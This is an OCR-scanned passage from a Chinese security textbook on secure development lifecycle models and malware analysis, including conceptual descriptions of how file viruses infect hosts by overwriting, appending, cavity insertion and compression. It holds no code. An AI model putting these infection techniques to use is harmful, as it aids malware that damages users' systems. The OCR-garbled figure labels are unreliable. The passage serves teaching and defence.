全 要 略 和 安全 规范 。 同 样 , 这 种 安全 需求 需要 通过 文档 在 项 目 起 始 的 时 候 就 定义 下 来 。 
传统 的 需求 分 析 主 要 是 功能 角度 分 析 需 要 哪些 功能 ,安全 需求 则 是 定义 不 许 系 统 以 哪 种 
方式 处 理 某 功能 。 分 析 人 员 通 常 是 以 攻击 者 的 角度 看 待 系统 应 注意 的 地 方 , 可 以 通过 开 
发 “滥用 用 例 ? 来 展现 不 允许 和 未 授权 的 动作 流 , 以 及 可 能 被 攻击 的 方式 。 用 例 的 包含 关 
系 可 以 阐述 许多 保护 机 制 ,例如 登录 过 程 ; 用 例 的 扩展 关系 可 以 阐明 许多 检测 机 制 , 例 如 
审计 日 志 。 需 求 一 般 包括 : 缺点 错误 预防 点 , 即 定义 了 应 该 避免 的 缺点 和 错误 ;安全 需 
求 处 理 点 的 关联 , 即 在 多 个 地 方 对 安全 需求 进行 了 处 理 , 这 些 地 方 可 以 关联 在 一 起 。 

3. 架构 和 设计 评审 、 威 胁 建 模 

软件 的 架构 和 设计 应 该 被 安全 分 析 人 员 尽 早 评审 ,避免 形成 有 安全 缺陷 的 体系 结构 
和 设计 。 为 了 避免 设计 漏洞 , 即 在 软件 系统 分 析 和 设计 阶段 就 应 考虑 可 能 面临 的 安全 威 
胁 ,需要 进行 威胁 建 模 , 例 如 系统 是 否 需 要 实体 认证 ,是 否 需要 保护 信息 的 私密 性 。 威 胁 
建 模 有 利于 及 早 发 现 安全 问题 。 

4. 软件 安全 编码 

需要 代码 的 实现 者 对 软件 漏洞 的 来 源 有 所 了 解 ,软件 编码 人 员 应 该 遵照 一 些 软件 安 
全 编码 原则 ,如 不 使 用 strcpy 而 使 用 strncpy 等 。 静 态 源 代码 分 析 工 具 可 以 自动 发 现 一 
些 潜 在 的 源 代码 安全 缺陷 ,并 加 以 警告 。 二 进 制 代码 审查 工具 也 能 够 帮助 发 现 一 些 第 三 
方 调用 库 中 的 安全 问题 ,以 提高 软件 的 整体 安全 性 。 

5. 软件 安全 测试 

包括 白 箱 、 黑 箱 、 灰 箱 测试 ,软件 渗透 测试 ,基于 风险 的 测试 ,判定 漏洞 的 可 利用 性 , 即 
对 测试 出 的 安全 漏洞 或 者 在 开发 结束 新 公布 的 软件 漏洞 进行 分 析 , 判 定 这 些 漏洞 是 否 可 
被 攻击 者 利用 ,构成 威胁 。 

其 中 需要 考虑 的 方面 还 包括 : 软件 安全 发 布 . 部 署 与 维护 。 这 包括 : 软件 代码 的 保 
护 , 版 权 保护 和 反 盗 版 ,软件 安装 用 户 权 限 ,补丁 管理 ,软件 的 安全 升级 。 

无 论 采 用 何 种 软件 开发 周期 模型 ,安全 都 应 该 与 其 紧密 结合 。 将 传统 软件 开发 生命 
周期 和 安全 软件 开发 生命 周期 两 者 间 关 系 进行 了 关联 和 结合 。 图 9-4 展示 了 SSDL 与 传 
统 开发 生命 周期 的 关系 ,这 里 传统 软件 开发 生命 周期 在 SSDL 的 外 面 一 层 呈 现 。 
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安全 基础 设施 、 防火 墙 、 入 侵 检测 系统 、DMZ 等 


补丁 管理 补丁 管理 
D. 开 发 阶段 C. 原 型 /设计 
4. 安 全 编码 规则 | | 3. 架 构 评审 / 
威胁 建 模 ee 
mi > 
波 | | 只 vu 
总 “ 阅 | | 发 
湛 | | 温 SSDL(1~6) 与 系 能 | | 媳 
这 | |# 统 开发 生命 周期 人 攻 
豆 | | 得 (A~F) 的 关系 t| | 委 
入 | | 意 RN 
洒 | | 臣 当 
全 后 
=、 
6 .判定 可 利用 性 | | .安全 原则 /规章 
FE. 项目 评审 和 评估 A. 项 目 起 始 
补丁 管理 补丁 管理 


安全 基础 设施 、 防 火 墙 、 入 侵 检 测 系统 、DMZ 等 
图 9-4 传统 软件 开发 生命 周期 与 安全 软件 开发 生命 周期 间 的 关系 


933 其 他 安全 软件 开发 生命 周期 模型 


1. 微软 可 信 计 算 安 全 开发 生命 周期 

为 了 可 以 抵抗 安全 攻击 的 软件 的 开发 ,微软 已 经 采纳 了 可 信 计 算 安 全 开发 生命 周期 
(Trustworthy Computing Security Development Lifecycle, SDL) 这 个 过 程 。 在 微软 的 软 
件 开 发 的 每 一 个 过 程 的 相应 阶段 中 ,SDL 为 其 增加 了 一 系列 以 安全 为 重点 的 活动 和 提交 
报告 。 这 些 安全 活动 和 报告 包括 : 在 需求 分 析 阶 段 ,对 安全 功能 的 要 求 和 可 信行 为 的 确 
切 定 义 ; 在 软件 设计 阶段 ,对 安全 风险 识别 的 威胁 建 模 ;在 代码 实现 阶段 ,静态 分 析 、 代 码 
扫描 工具 和 代码 审核 工具 的 使 用 以 及 以 安全 为 核心 的 测试 ,如 Fuzz 测试 代码 ;在 审查 阶 
段 ,一 个 额外 的 安全 举动 包括 最 终 的 代码 审查 和 历史 代码 的 审查 ;在 发 布 阶段 ,最 后 的 安 
全 检查 是 由 微软 核心 安全 小 组 来 完成 。 该 小 组 由 安全 专家 组 成 .在 整个 软件 开发 周期 中 
都 可 以 参与 产品 的 开发 。 

微软 公司 通过 利用 安全 衡量 指标 ,以 及 微软 核心 安全 团队 的 安全 专业 知识 来 对 软件 
开发 人 员 进 行 强制 性 的 安全 培训 。 从 微软 的 报告 发 现 ,利用 SDL 来 开发 产品 的 安全 性 能 
令 人 鼓舞 。 安 全 性 能 的 衡量 指标 是 在 产品 发 布 之 后 ,关键 的 安全 公告 的 数量 。SDL 通过 
以 下 12 个 阶段 过 程 来 表达 ,图 9-5 给 出 了 对 SDL 过 程 的 简要 介绍 。 
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安全 培训 

安全 体系 使 用 安全 性 开发 为 产品 创建 | 准备 安全 最 终 安全 服务 
安全 性 自动 与 | 安全 设计 | 结构 与 攻击 工具 与 安全 性 最 安全 文档 ”| 疹 和 守 辣 | 安全 推动 ”| 安全 和 
向 SWI 注 册 | 最 佳 做 法 | 面市 术 成 助 建 模 | 。 储 开 发 和 汪汪 法 和 工具 和 审核 响应 执行 

计 透 交 试 
八 
第 > 设计 > 实施 > 验证 SCE rrr 
ps pe pe 7 4 


图 9-5 微软 可 信 技 术 安 全 开发 生命 周期 


2. 安全 软件 开发 的 小 组 软件 过 程 

安全 软件 开发 的 小 组 软件 过 程 (Team Software Process for Secure Software 
Development) 是 由 CMU SEI 提出 的 。TSP 为 适用 于 团体 和 个 人 的 软件 工程 提供 了 一 个 
框架 ,通过 TSP 产生 的 软件 比 起 根据 现 有 方法 产生 的 软件 要 少 一 个 或 者 两 个 数量 级 的 缺 
陷 数 目 。 

TSP-Secure 将 TSP 进一步 扩展 , 它 直 接 专注 于 软件 应 用 的 安全 ,从 3 个 方面 陈述 了 
安全 软件 开发 。 第 一 ,考虑 到 安全 软件 不 是 偶然 建立 的 ,TSP-Secure 陈述 了 安全 计划 ， 
TSP-Secure 帮助 建立 自我 导向 的 开发 团队 。 第 二 ,因为 安全 和 质量 是 紧密 相关 的 ,TSP- 
Secure 在 整个 产品 的 开发 生命 周期 中 ,帮助 管理 质量 。 最 后 ,由 于 建立 安全 软件 的 人 们 
必须 有 一 个 软件 安全 问题 的 意识 ,TSP-Secure 还 包括 了 对 开发 人 员 安全 意识 的 训练 。 

那些 使 用 TSP-Secure 的 小 组 建立 他 们 自己 的 计划 。 初 始 计划 通过 一 系列 项 目 启动 
会 议 执行 ,一 般 持续 3 一 4 天 的 时 间 。 这 个 启动 一 般 是 由 一 个 训练 有 素 的 团队 教练 带领 ， 
该 团队 必须 对 工作 的 安全 目标 和 执行 方法 达到 共同 的 认识 ,产生 一 个 详细 的 指导 工作 的 
计划 ,并 且 获 得 对 该 计划 的 支持 。 包 含 在 计划 中 的 典型 任务 为 : 确定 安全 风险 ,引出 和 定 
义 安全 需求 ,安全 设计 和 代码 审查 ,以 及 静态 分 析 工 具 的 应 用 ,单元 测试 和 模糊 测试 。 

TSP-Secure 团队 的 成 员 要 从 9 个 标准 团队 成 员 角 色 中 选择 至 少 一 个 角色 。 在 定义 
的 角色 中 ,有 一 个 角色 称 为 安全 管理 者 。 安 全 管理 者 在 以 下 方面 领导 着 整个 团队 : 确保 
安全 渗透 于 产品 需求 ,设计 ,实施 ,审查 和 测试 中 ;确保 产品 在 静态 和 动态 方面 安全 ;在 安 
全 问题 方面 ,提供 及 时 的 分 析 和 警告 ;跟踪 任何 安全 风险 或 者 安全 问题 到 最 大 集合 。 经 常 
浏览 像 MITRE 弱点 库 ,US-CERT 安全 警告 ,以 及 微软 安全 指导 (Security Advisory) 这 
样 的 网 页 ,它们 可 以 展示 出 导致 安全 弱点 的 共同 的 软件 缺陷 ,例如 缓冲 区 溢出 。 因 此 ， 
TSP-Secure 质量 管理 的 策略 是 在 软件 开发 生命 周期 中 ,去 除 多 个 缺陷 点 。 去 除 的 缺陷 点 
越 多 ,在 提出 它们 之 后 立刻 找到 问题 的 可 能 性 越 大 ,这 使 得 问题 能 够 被 轻松 地 修复 。 

每 个 可 除 缺陷 的 活动 可 以 被 认为 是 一 个 过 滤器 ,删除 了 一 定 百分比 的 可 能 导致 软件 
产品 漏洞 的 缺陷 ,如 图 9-6 所 示 。 在 软件 开发 生命 周期 中 ,去 除 缺陷 的 过 滤器 越 多 ,那么 
在 产品 发 布 时 ,软件 产品 中 剩余 的 可 能 导致 软件 漏洞 的 缺陷 则 会 越 少 。 更 重要 的 是 ,早期 
测量 到 缺陷 ,能 够 使 组 织 在 软件 开发 生命 周期 的 早期 采取 纠正 措施 。 

每 当 一 个 缺陷 被 移 除 时 ,安全 性 被 重新 度量 ,每 个 缺陷 移 除 点 也 将 变 成 度量 点 。 这 种 
度量 其 至 比 缺 陷 移 除 和 防止 还 重要 ,因为 它 可 以 告诉 一 个 团队 ,他 们 现在 的 状况 ,帮助 他 
们 决定 是 要 移动 到 下 一 个 步骤 ,还 是 停止 并 采取 纠正 措施 ,并 且 指 示 他 们 ,为 了 达到 目标 ， 
应 该 在 哪些 位 置 修复 进程 。 
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在 需求 分 析 中 ， 能 去 除 
脆弱 性 的 百分比 


EEE | 设计 阶段 


在 设计 阶段 ， 能 去 除 
“> 脆弱 性 的 百分比 


4 


5==>| ”实现 阶段 


在 实现 阶段 ， 能 去 除 


“> 脆弱 性 的 百分比 


目标 是 使 可 能 导致 脆弱 性 
的 缺陷 最 小 化 
图 9-6 去 除 漏洞 过 滤器 


3. BSI 成 熟 模型 

BSI 成 熟 模型 (BSIMM) ,是 用 来 帮助 理解 和 设计 安全 的 软件 。 通 过 理解 和 分 析 来 自 
9 个 主要 的 软件 安全 计划 的 真实 数据 ,BSIMM 被 提出 来 了 。 尽 管 方 法 不 同 ,但 是 很 多 方 
法 都 有 着 相同 的 背景 。 这 个 共同 背景 在 BSIMM 中 被 捕捉 和 描述 。 作 为 一 个 组 织 特征 ， 
软件 安全 框架 为 BSIMM 提供 了 一 个 概念 框架 。 如 果 使 用 得 当 ,BSIMM 可 以 帮助 确定 你 
的 组 织 对 于 现实 世界 的 软件 安全 要 求 间 的 差距 以 及 可 以 采取 哪些 步骤 使 你 的 方法 更 有 
效 。BSIMM 是 一 个 集合 ,收集 了 在 当前 使 用 的 好 的 想法 和 行为 。 提 供 了 一 种 方法 来 评 
估 一 个 组 织 ,划分 优先 顺序 以 及 展示 当前 状态 。 不 是 所 有 组 织 必须 达到 同样 的 安全 目标 ， 
但 所 有 的 组 织 可 以 用 同一 把 尺子 来 衡量 。 

BSIMM 的 目标 是 构建 和 不 断 发 展 软件 安全 行动 的 指南 。 当 熟悉 BSIMM 活动 的 时 
候 , 软 件 安全 就 注入 到 一 个 组 织 中 ,需要 认真 规划 并 且 始 终 涉 及 广泛 的 组 织 变革 。 通 过 明 
确 指出 的 目标 和 目的 ,并 通过 根据 度量 跟踪 适合 自身 的 做 法 ,可 以 有 条 不 率 地 将 软件 安全 
建立 到 组 织 的 软件 开发 实践 中 来 。 通 过 开展 BSIMM 所 述 的 活动 ,可 以 逐步 发 展 安全 计 
划 ,在 最 佳 的 时 间 里 ,实现 高 水 平 的 软件 安全 ,而 不 需要 过 度 的 开销 。 

软件 安全 框架 中 12 种 实践 每 种 实践 被 分 为 三 个 成 熟 度 等 级 ,以 明确 何 种 行为 应 该 被 
首先 处 理 ,而 哪些 需要 优先 。 尽 管 这 不 是 一 本 完整 的 软件 安全 操作 指南 , 它 还 是 提供 了 很 
多 的 观点 和 基本 原则 。 每 个 行为 都 有 一 个 声明 的 目标 ,一 个 描述 和 一 个 简单 的 例子 来 说 
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明 至 少 一 个 公司 是 如 何 实现 它 的 ;有 些 非常 的 简单 ,但 很 有 效 。 例 如 ,在 培训 实践 中 有 一 
个 行为 是 要 求 软件 安全 团队 有 一 个 公开 的 实验 室 阶段 ,这 段 时 间 里 开发 人 员 可 以 参与 进 
来 并 讨论 安全 开发 或 者 特定 的 编码 问题 ,来 为 其 他 部 门 提供 非 正式 的 资源 。 

由 于 BSIMM 是 基于 各 个 公司 的 具体 实践 , 它 可 以 被 看 作 是 一 种 事实 的 标准 。 它 提 
供 了 判别 某 做 法 是 否 是 通常 被 采纳 的 实践 做 法 的 真实 而 有 说 服 力 的 依据 。 而 且 , 不 像 很 
多 官方 的 标准 , 它 认 同 并 非 所 有 的 公司 都 需要 达到 相同 的 安全 性 目标 。 没 有 一 个 公司 会 
需要 执行 所 有 的 行为 。 这 个 模型 确实 提供 了 一 个 潜在 的 度量 所 有 公司 的 基准 ,并 演示 了 
其 流程 。 


9.4 恶意 代码 分 析 


941 恶意 软件 的 分 类 与 区 别 


恶意 软件 (malicious software 或 malware) ,统称 其 行为 损害 系统 用 户 和 系统 所 有 者 
利益 的 软件 ,是 故意 在 计算 机 系统 上 执行 恶意 任务 的 恶意 代码 的 集合 。 
恶意 软件 大 致 分 为 两 类 ,是 从 主机 依赖 的 角度 进行 的 分 类 ,如 图 9-7 所 示 。 


恶意 软件 


信赖 主机 程序 独立 于 主机 程序 


EE 
1 


后 门 逻辑 炸弹 木马 病毒 蠕虫 


可 复制 
图 9-7 恶意 软件 的 分 类 


依赖 主机 程序 的 恶意 软件 和 独立 于 主机 程序 的 恶意 软件 。 前 者 不 能 独立 于 应 用 程序 
或 系统 程序 , 即 存在 宿主 文件 ,必须 依赖 宿主 的 运行 而 启动 ;后 者 是 能 在 操作 系统 上 运行 
的 、 独 立 的 程序 。 

1. 病毒 

如 果 恶 意 代码 将 其 自身 的 副本 添加 到 文件 ,文档 或 磁盘 驱动 器 的 启动 扇 区 来 进行 复 
制 , 则 被 认为 是 病毒 。 病 毒 代码 的 明显 特征 是 自行 复制 。 病 毒 通常 会 将 其 包含 的 负载 (如 
木马 ) 放 置 在 一 个 本 地 计算 机 上 ,然后 执行 一 个 或 多 个 恶意 操作 (如 删除 用 户 数据 )。 另 
外 , 仅 进 行 复 制 而 不 具有 负载 的 病毒 仍然 是 恶意 软件 ,因为 该 病毒 自身 在 复制 时 可 能 会 损 
坏 数据 、 消 耗 系统 资源 并 占用 网 络 带宽 。 

2. 蠕虫 

如 果 代 码 在 没有 携带 者 (宿主 文件 ) 的 情况 下 复制 , 则 被 认为 是 蠕虫 。 蠕 虫 试图 将 自 
己 复 制 到 宿主 计算 机 上 ,然后 利用 此 计算 机 的 通信 信道 进行 复制 。 病 毒 寻找 文件 以 进行 
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感染 ,但 蠕虫 仅 尝试 复制 其 自身 。 

3. 木马 

木马 与 病毒 .蠕虫 的 区 别 在 于 它 不 进行 复制 (传播 )。 但 是 病毒 和 蠕虫 可 用 于 将 木马 
作为 攻击 负载 的 一 部 分 复制 到 目标 系统 上 。 木 
马 通常 的 意图 是 在 系统 中 提供 后 门 ,使 攻击 者 
可 以 窃取 数据 。 

关于 木马 ,有 两 个 术语 与 之 相关 。 

(1) 远程 访问 特洛伊 : 某 些 木 马 程序 使 攻 
击 者 可 以 远程 控制 系统 ,此 类 程序 称 为 远程 访 
问 特洛伊 (Remote Access Trojan, RAT)。 

(2) Rootkit: 是 一 组 高 级 软件 工具 程序 的 代码 复制 否 此 代码 是 木马 上 | 
集合 ,攻击 者 可 用 于 获取 对 计算 机 的 未 经 授权 
的 远程 访问 权限 并 发 动 其 他 攻击 。 这 些 程序 可 是 


能 使 用 许多 高 级 的 技术 ,能 够 监控 系统 运行 状 
态 ,包括 监视 击 键 、 更 改 系统 日 志文 件 、 在 系统 唱和 吾 | 此 代码 是 刀 虫 上 | 


中 创建 后 门 以 及 对 网 络 上 的 其 他 计算 机 发 起 


开始 


此 代码 不 是 | 
恶意 软件 


攻击 。 
图 9-8 为 区 别 病毒 .蠕虫 和 木马 三 种 主要 此 代码 是 病毒 
恶意 软件 的 流程 。 
4. 其 他 恶意 软件 结束 


(1) 后 门 。 后 门 是 在 恶意 攻击 者 选择 用 来 
远程 连接 系统 的 工具 。 典 型 的 后 门 会 在 运行 它 
的 主机 上 打开 一 个 网 络 端口 ,然后 侦 听 的 后 门 
程序 会 等 待 攻击 者 的 远程 连接 。 后 门 通 常会 和 木马 功能 混合 使 用 。 另 外 一 种 后 门 利用 了 
程序 的 设计 缺陷 。 有 些 应 用 程序 ,例如 SMTP 的 早期 实现 具有 允许 执行 某 一 命令 (如 调 
试 命令 debug) 的 功能 。Morris 蠕虫 就 是 使 用 这 个 命令 在 远程 执行 它 自己 ,如果 系 统 安装 
了 这 个 有 后 门 的 程序 ,蠕虫 就 会 通过 将 此 命令 放置 在 邮件 收 件 人 的 位 置 来 实现 。 

(2) 逻辑 炸弹 。 逻 辑 炸弹 是 合法 的 应 用 程序 ,只 是 在 编程 时 被 故意 写 入 的 某 种 恶意 
功能 ,在 一 定 程度 下 (如 时 间 、 次 数 或 者 某 种 逻辑 组 合 ) 会 出 现 。 例 如 ,作为 版 权 保护 方案 ， 
某 个 应 用 程序 有 可 能 会 在 运行 几 次 后 就 在 硬盘 中 将 其 自身 删除 。 


942 病毒 的 机 理 与 防治 


1. 病毒 的 定义 

病毒 是 一 种 人 为 制造 的 、 能 够 进行 自我 复制 的 ,对 计算 机 资源 具有 破坏 作用 的 一 组 程 
序 和 指令 的 集合 。1994 年 2 月 18 日 公布 的 (中 华人 民 共和 国 计 算 机 信息 系统 安全 保护 
条 例 ) 中 ,计算 机 病毒 被 定义 为 :“ 计 算 机 病毒 是 指 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 
计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程 
序 代 码 。” 


图 9-8 病毒 .蠕虫 和 木马 的 区 别 
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病毒 与 生物 病毒 一 样 , 有 其 自身 的 病毒 体 (病毒 程序 ) 和 寄生 体 (宿主 HOST ,病毒 载 
体 ,携带 者 ) 。 所 谓 感染 或 寄生 ,是 指 病毒 将 自身 嵌入 到 宿主 指令 序列 中 。 寄 生体 为 病毒 
提供 一 种 生存 环境 ,是 一 种 合法 程序 。 病 毒 程序 寄生 于 合法 程序 后 ,成 为 了 程序 的 一 部 
分 。 并 随 着 合法 程序 的 执行 而 执行 ,也 随 着 合法 程序 的 消失 而 消失 。 

病毒 将 携带 者 作为 攻击 对 象 (宿主 ) 并 感染 之 。 目 标 携带 者 对 象 的 数量 和 类 型 随 恶意 
软件 的 不 同 而 大 小 不 同 ,下面 给 出 最 常见 的 目标 携带 者 的 示例 。 

(1) 可 执行 文件 。 通 过 其 自身 附加 到 宿主 程序 进行 复制 的 典型 病毒 类 型 的 目标 对 
象 。 除 了 使 用 . exe 扩展 名 的 典型 可 执行 文件 之 外 ,具有 扩展 名 . com、. sys、. dll 等 文件 也 
可 用 于 此 用 途 。 

(2) 脚本 。 将 脚本 作为 携带 者 目标 文件 。 包 括 使 用 诸如 Microsoft Visual Basic 
Script JavaScript\AppleScript 之 类 的 脚本 语言 。 此 类 文件 的 扩展 名 包括 . vbs、. js 
和 . prl。 

(3) 宏 。 携 带 者 是 宏 脚 本 语言 的 文件 。 例 如 ,病毒 可 在 Microsoft Word 中 使 用 宏 语 
言 来 生成 许多 效果 ,包括 从 恶作剧 效果 (在 文档 中 改变 单词 或 更 改 颜色 ) 到 恶意 效果 (格式 
化 计算 机 的 硬盘 驱动 器 ) 。 

(4) 启动 扇 区 。 计 算 机 磁盘 上 的 特定 区 域 (例如 , 主 启动 目 录 记 录 MBR) 也 可 以 作为 
携带 者 ,因为 它 可 以 执行 恶意 代码 。 当 某 个 磁盘 被 感染 时 ,如 果 使 用 该 磁盘 来 启动 其 他 计 
算 机 系统 ,将 会 复制 病毒 。 

2. 病毒 的 分 类 

1) 按照 病毒 的 链接 方式 分 类 

(1) 源码 型 病毒 。 该 病毒 攻击 高 级 语言 (如 C.FORTRAN 等 ) 编 写 的 程序 。 在 编译 
用 高 级 语言 编写 的 程序 之 前 ,将 病毒 代码 插入 到 源 程序 中 ,经 编译 成 为 合法 程序 的 一 部 
分 。 这 类 病毒 一 般 存 在 于 语言 处 理 程序 和 链接 程序 中 。 

(2) 嵌入 型 病毒 ,也 称 为 人 侵 型 病毒 。 该 类 病毒 将 自身 嵌入 到 已 有 程序 中 ,把 病毒 的 
主体 程序 与 其 攻击 对 象 以 插入 方式 链接 ,并 代替 其 中 部 分 不 常用 的 功能 模块 或 堆栈 区 。 
这 种 病毒 较 难 发 现 。 

(3) 外 过 病毒 。 通 常 附 在 宿主 程序 的 首部 或 者 尾部 ,对 原来 的 程序 不 做 修改 (车 寄生 
在 尾部 , 则 修改 程序 的 第 一 条 可 执行 指令 ,使 病毒 能 先 于 宿主 程序 执行 ,控制 主动 权 以 便 
传播 昔 延 ) ,相当 于 给 宿主 程序 加 了 个 外 壳 。 这 种 病毒 最 为 常见 ,易于 发 现 和 清除 。 

(4) 译 码 型 病毒 。 隐 藏 在 微软 Office 等 文档 中 , 如 宏 病 毒 、 脚 本 (VBScript， 
JavaScript) 病 毒 等 ,此 类 病毒 一 般 是 解释 执行 。 

(5) 操作 系统 型 病毒 。 这 种 病毒 用 自己 的 程序 试图 加 入 或 取代 部 分 操作 系统 功能 进 
行 工作 ,具有 很 强 的 破坏 力 , 可 导致 整个 系统 的 瘫痪 ,如 圆 点 病毒 和 大 麻 病 毒 。 这 种 病毒 
在 运行 时 ,用 自己 的 逻辑 部 分 取代 操作 系统 的 合法 程序 模块 ,根据 病毒 自身 的 特点 和 被 替 
代 的 操作 系统 中 合法 程序 模块 运行 的 作用 以 及 病毒 取代 操作 系统 的 方式 等 ,对 操作 系统 
进行 破坏 。 

2) 按照 病毒 的 寄生 存储 的 位 置 分 类 

(1) 引导 型 病毒 。 也 称 为 引导 区 病毒 。 操 作 系统 的 引导 模块 存放 在 磁盘 的 固定 区 域 
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(引导 区 ) ,并 且 控 制 权 的 转 接 方式 是 以 物理 地 址 为 依据 ,而 不 是 以 操作 系统 引导 区 的 内 容 
为 依据 ,因此 病毒 占据 该 物理 位 置 即 可 获得 控制 权 。 引 导 型 病毒 按 其 寄生 对 象 的 不 同 ,又 
可 分 为 主 引导 区 (Master Boot Record, MBR) 病 毒 和 引导 区 (Boot Record, BR) 病毒 。 

(2) 文件 型 病毒 。 文 件 型 病毒 主要 感染 可 执行 文件 ,如 扩展 名 为 . EXE、. COM 等 文 
件 ,是 一 种 较为 常见 的 病毒 。 文 件 型 病毒 的 安装 必须 借助 病毒 的 载体 程序 , 即 要 运行 病毒 
的 载体 程序 ,才能 把 文件 型 病毒 引入 内 存 。 目 录 病 毒 是 文件 型 病毒 的 一 种 特例 ,其 感染 方 
式 非常 独特 , 仅 修改 目录 区 , 便 可 达 感 染 的 目的 。 宏 病毒 则 是 一 种 数据 文件 型 病毒 。 

(3) 混合 型 病毒 。 也 称 为 多 型 病毒 ,是 综合 了 引导 型 和 文件 型 病毒 特征 的 病毒 ,可 感 
染 文件 和 引导 扇 区 两 种 目标 。 这 样 的 病毒 还 可 能 使 用 了 加 密 、 变 形 ( 代 码 混淆 ,多 态 ) 等 
技术 。 

引导 型 病毒 涉及 操作 系统 安全 ,本 节 重 点 介绍 文件 型 病毒 。 

3. 文件 型 病毒 的 感染 技术 

(1) 重 写 病毒 。 这 种 病毒 从 磁盘 上 找到 一 个 文件 ,简单 地 用 自己 的 副本 改写 该 文件 ， 
是 一 种 较 初 级 的 技术 。 重 写 病毒 是 不 能 从 系统 中 彻底 删除 的 ,只 能 把 被 感染 的 文件 删除 ， 
然后 再 从 备份 介质 恢复 。 图 9-9 表示 了 重 写 病毒 攻击 时 宿主 文件 内 容 的 变化 。 

另 一 种 重 写 病毒 传染 方式 适用 于 非常 短小 的 病毒 。20 世纪 90 年 代 初 ,许多 病毒 作 
者 师 徒 写 出 最 短 的 病毒 。 如 有 些 病毒 仅 22 个 字 节 (Trivial. 22) 。 这 种 病毒 的 算法 非常 
简单 : 

。 在 当前 目录 下 寻找 任何 新 的 宿主 文件 。 

。 以 写 的 方式 打开 文件 。 

。 把 病毒 代码 写 入 宿主 文件 的 顶端 。 

图 9-10 显示 了 重 写 病毒 简单 地 重 写 了 宿主 文件 的 顶部 ,而 没有 改变 文件 的 大 小 。 
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图 9-9 重 写 病毒 攻击 时 改变 宿主 文件 大 小 图 9-10 重 写 病毒 攻击 时 未 改变 宿主 文件 大 小 


还 有 一 种 比较 罕见 的 重 写 技术 是 随机 重 写 ,不 改变 文件 顶部 的 代码 ,而 是 在 宿主 文件 
中 随机 找 一 个 位 置 把 自己 写 进去 。 由 于 反 病 毒 扫描 程序 会 为 了 提供 性 能 而 减少 磁盘 
LI/O, 因 此 会 尽 可 能 只 查找 已 知 的 位 置 。 扫 描 器 在 查找 随机 重 写 病毒 时 开销 较 大 ,因为 扫 
描 器 必须 搜索 宿主 程序 的 全 部 内 容 , 因 此 随机 重 写 更 加 危险 。 

(2) 追加 病毒 。 典 型 的 DOS 环境 下 的 COM 文件 感染 技术 是 在 宿主 文件 的 首部 插入 
一 条 JMP 指令 ,指向 初始 文件 的 尾部 ( 即 追加 的 病毒 代码 )。 追 加 技术 可 以 使 用 在 任何 类 
型 的 可 执行 文件 中 ,如 EXE、PE 等 。 这 些 文件 都 有 一 个 文件 头 , 存 放 着 主 程序 的 人 口 点 。 
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多 数 情况 下 ,病毒 会 把 入 口 点 蔡 换 成 追加 到 文件 未 尾 的 病毒 代码 的 起 始 地 址 。 图 9-11 显 
示 典 型 的 DOS COM 追加 病毒 。 
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图 9-11 追加 病毒 


(3) 前 置 病毒 。 把 病毒 的 代码 插入 到 宿主 程序 的 前 面 ,这 些 代码 通常 采用 高 级 语言 
如 C.PASCAL 等 实现 ,通常 在 磁盘 上 创建 
一 个 包含 原文 件 内 容 的 临时 文件 ,然后 用 程序 代码 病 于 代码 
system 这 样 的 函数 执行 临时 文件 中 原来 的 程序 代码 
程序 。 这 种 病毒 通常 会 向 临时 文件 中 的 宿 上 一 
主 程序 传输 命令 行 参 数 ,这 样 应 用 程序 的 功 
能 就 不 会 因为 缺少 参数 而 退出 。 图 9-12 显 
示 了 典型 的 前 置 病毒 。 

前 置 病毒 的 变种 为 典型 寄生 病毒 。 这 图 9-12 前 置 病毒 
种 病毒 用 自身 的 代码 重 写 宿主 的 主要 数据 ， 
并 把 宿主 顶部 的 这 些 数 据 存放 在 宿主 程序 的 最 后 ,长 度 通常 等 于 病毒 体 的 长 度 。 

(4) 蛙 穴 病 毒 。 蛙 穴 病 毒 (如 图 9-13 所 示 ) 通 常 不 增加 被 感染 对 象 的 大 小 ,而 是 重 写 
宿主 文件 中 可 用 来 安全 存放 病毒 代码 的 区 域 ,如 重 写 二 进 制 宿 主 文件 中 的 零 值 区 域 ,或 包 
含 空格 的 区 域 。 
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图 9-13 ” 蛙 穴 病毒 将 自身 代码 注入 到 宿主 文件 的 一 个 洞穴 中 


有 一 种 特殊 的 星 穴 病毒 利用 了 PE 程序 的 重 定 位 节 。 在 正常 情况 下 ,大 多 数 可 执行 
文件 的 重 定位 节 都 未 被 使 用 。 现 在 的 链接 程序 可 以 配置 为 在 生成 PE 可 执行 文件 时 不 包 
含 重 定位 表 , 以 减 小 其 尺寸 。 如 果 PE 程序 文件 包含 重 定位 节 的 话 , 则 会 成 为 重 定位 节 星 
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穴 病 毒 的 宿主 ,其 重 定位 节 将 被 该 类 病毒 的 代码 重 写 。 这 种 病毒 在 感染 前 要 确认 重 定位 
节 是 否 是 宿主 的 最 后 ,或 者 其 长 度 是 否 足够 大 ,否则 文件 在 感染 过 程 中 很 容易 被 破坏 。 
(5) 压缩 型 病毒 。 压 缩 宿主 程序 是 一 种 特殊 的 感染 技术 。 这 种 技术 有 时 用 来 隐瞒 宿 
主 程序 长 度 的 增长 : 采用 一 个 二 进 制 的 压缩 算法 ,对 宿主 程序 进行 充分 的 压缩 ,从 而 节省 
了 空间 (如 图 9-14 所 示 )。 很 多 也 被 攻击 者 用 来 压缩 木马 、 病 毒 或 蠕虫 ,以 增加 迷惑 性 , 同 
时 减少 长 度 。 
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图 9-14 压缩 型 病毒 


(6) 变形 虫 Camoeba) 感 染 技术 。 这 种 技术 较 罕 见 , 它 把 宿主 程序 嵌入 到 病毒 体 中 , 即 

把 病毒 头 部 放 到 文件 之 前 ,病毒 尾部 追加 到 宿主 之 后 (如 图 9-15 所 示 )。 病 毒 头 部 可 以 访 

问 尾 部 ,然后 被 载 和 人。 病毒 在 硬盘 上 生成 一 个 包含 原始 宿主 内 容 的 新 文件 ,以 便于 它 将 来 
可 以 正确 运行 。 

病毒 代码 头 
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图 9-15 变形 虫 感染 技术 


(7) 嵌入 式 解密 程序 技术 。 一 些 高 级 的 病毒 会 把 其 解密 程序 注入 可 以 执行 的 宿主 文 
件 中 ,并 将 宿主 入 口 点 修改 为 指向 解密 程序 代码 。 解 密 程序 的 注入 位 置 是 随机 选择 的 , 解 
密 程序 被 分 割 成 多 个 部 分 。 病 毒 会 把 被 重 写 的 区 域 存储 在 病毒 代码 中 ,以 便 感染 之 后 宿 
